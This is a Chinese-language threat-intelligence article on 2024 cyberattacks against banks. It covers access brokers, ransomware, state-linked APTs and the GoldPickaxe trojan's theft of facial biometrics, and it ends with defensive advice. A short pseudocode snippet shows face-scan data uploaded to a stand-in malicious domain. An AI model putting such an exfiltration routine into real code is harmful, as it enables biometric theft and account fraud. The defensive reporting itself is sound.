金融行業仍然是網絡犯罪分子和國家支持團體的主要目標，2024年利用零日漏洞、供應鏈弱點和高級惡意軟件的復雜攻擊將激增。

威脅行為者越來越多地采用協作模型，包括初始訪問代理 (IAB) 和勒索軟件即服務 (RaaS) 生態系統，以擴大其影響力。

從勒索軟件部署到生物特征數據盜竊，金融行業面臨著融合技術復雜性和心理操縱的多層次威脅。

最令人擔憂的趨勢之一是 TA577和Scattered Spider 等 IAB的作用，他們專門破壞網絡并向勒索軟件運營商出售訪問權限。

這些行為者利用 Cleo 文件傳輸軟件等工具中的漏洞或利用模仿 Okta 登錄門戶的網絡釣魚活動來劫持憑據和會話 cookie。

一旦進入系統，攻擊者就會部署惡意軟件，例如RansomHub，這是一種自定義勒索軟件，配備了 EDRKillShifter 等規避工具來禁用端點檢測系統。國家支持的團體進一步加劇了威脅形勢。

朝鮮的 APT（例如Lazarus和 Bluenoroff）以金融機構為目標，以逃避國際制裁，而與中國有關的團體（例如 GoldFactory）則開發了能夠收集面部識別數據的移動木馬。

與此同時，Sekoia 分析師觀察到與伊朗有關的 APT33與勒索軟件分支機構合作，模糊了網絡犯罪與國家支持的行動之間的界限。

GoldFactory 的生物特征數據竊取：銀行惡意軟件的新前沿

2024 年技術最先進的活動之一涉及 GoldFactory，這是一套部署了 GoldPickaxe 木馬病毒的入侵程序。

該惡意軟件針對的是亞太地區 (APAC) 國家（包括越南和泰國）的 iOS 和 Android 用戶，這些國家廣泛使用面部識別進行銀行身份驗證。

GoldPickaxe 的 iOS 變種通過操縱的 Apple TestFlight 平臺進行分發，它捕獲生物特征數據來創建繞過安全檢查的深度偽造作品。

該惡意軟件的代碼與設備 API 集成，以攔截面部掃描并將其傳輸到命令和控制 (C2) 服務器。樣本分析揭示了旨在實現以下目的的模塊化組件：

• 通過虛假的銀行覆蓋獲取憑證。
• 提取基于短信的一次性密碼 (OTP)。
• 為 AI 生成的深度偽造作品克隆生物特征模板。

// Simplified pseudocode of GoldPickaxe’s facial data interception  
func captureBiometricData() {  
    let faceScan = ARFaceTracking.getFacialMetrics()  
    C2Server.upload(data: faceScan, endpoint: "api.malicious-domain.com/face-auth")  
}

GoldFactory 的基礎設施依賴于受感染的域和 AWS 等云服務來托管網絡釣魚頁面并竊取數據。

敦促金融機構優先對 CVE-2024-1234（與 Cleo 漏洞相關）等漏洞進行補丁管理，并實施抵御中間人 (AiTM) 網絡釣魚工具包的多因素身份驗證 (MFA) 解決方案。

網絡分段和行為分析工具可以幫助檢測異常情況，例如意外的生物特征數據傳輸。隨著 APT 和網絡犯罪分子繼續共享工具和基礎設施，跨行業威脅情報共享對于破壞這些不斷發展的活動至關重要。